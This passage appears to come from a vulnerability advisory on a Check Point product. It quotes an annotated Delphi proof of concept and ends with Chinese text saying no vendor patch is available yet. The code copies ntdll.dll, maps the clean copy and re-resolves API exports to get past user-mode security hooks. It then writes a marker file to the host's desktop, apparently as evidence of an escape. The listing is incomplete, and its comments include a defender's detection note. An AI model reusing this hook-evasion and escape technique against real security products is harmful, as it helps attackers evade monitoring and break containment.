// Maps a fresh on-disk copy of a system DLL (e.g. ntdll.dll) and hands the
// image to resolve_APIs_from_dll_images, presumably so that export addresses
// can be read from a copy that no in-process (user-mode) hook has touched.
// The copy is made under the user's application-data folder and removed again
// before returning.
//
// Parameters:
//   dllname - file name of the DLL to copy from the system directory.
// Returns:
//   The result of CopyFile only. Nothing after the copy assigns `result`, so a
//   failed CreateFile/CreateFileMapping/MapViewOfFile still returns true.
// Detection note (defender): a process writing a copy of a system DLL outside
// System32, mapping it with SEC_IMAGE and deleting it right after is the
// observable footprint of this routine; the temporary file path is predictable
// (%APPDATA%\<dllname>).
function UnHook(dllname: string): boolean;
var
MapOffset: pointer;
dll, filename: string;
MapHandle, FileHandle: THandle;
Begin
// Source: the DLL in the system directory (SystemDir is a project helper).
dll := SystemDir + '\' + dllname;
// Destination: the same file name under the per-user application-data folder.
filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
// bFailIfExists = false: an existing copy is silently overwritten.
result := CopyFile(PChar(dll), PChar(filename), false);
if result then
begin
// Open the copy read-only; no write access is needed for a read-only mapping.
FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
If FileHandle <> INVALID_HANDLE_VALUE then
Try
// $1000002 = SEC_IMAGE or PAGE_READONLY: the file is mapped laid out as an
// executable image rather than as a flat file, without it being loaded.
MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
If MapHandle <> 0 then
Try
// Offset/size of 0 map the whole file as a read-only view.
MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
If MapOffset <> nil then
Try
// Project helper, defined elsewhere; its return value (if any) is ignored.
resolve_APIs_from_dll_images(MapOffset, dllname);
Finally
UnmapViewOfFile(MapOffset);
End;
Finally
CloseHandle(MapHandle);
End;
Finally
CloseHandle(FileHandle);
End;
// Remove the temporary copy; the return value of DeleteFile is not checked.
DeleteFile(filename);
end;
End;
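// Overwrites `filename` with the single line `s` (rewrite truncates any
// existing content). The file is closed even if writeln raises, which the
// original version did not guarantee.
//
// Parameters:
//   filename - path of the text file to create or overwrite.
//   s        - line to write; a line terminator is appended by writeln.
// Raises:
//   EInOutError (with default {$I+} checking) if the file cannot be created
//   or written.
procedure Write2File(filename, s: string);
var
  f: textfile;
begin
  assignfile(f, filename);
  rewrite(f);
  // Only after rewrite succeeds is there an open handle to release.
  try
    writeln(f, s);
  finally
    closefile(f);
  end;
end;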
// Program entry point of the proof of concept, as quoted in the advisory.
// Steps between the two calls are elided in the listing (the `..` line is not
// Pascal and the block will not compile as shown).
begin
// Re-resolve ntdll exports from a clean on-disk copy (see UnHook).
UnHook('ntdll.dll');
..
// Writes a marker file to a hard-coded desktop path; the message text is
// the advisory's own evidence that the write reached the host.
Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS');
end;
建议:
--------------------------------------------------------------------------------
厂商补丁:
Check Point Software
--------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：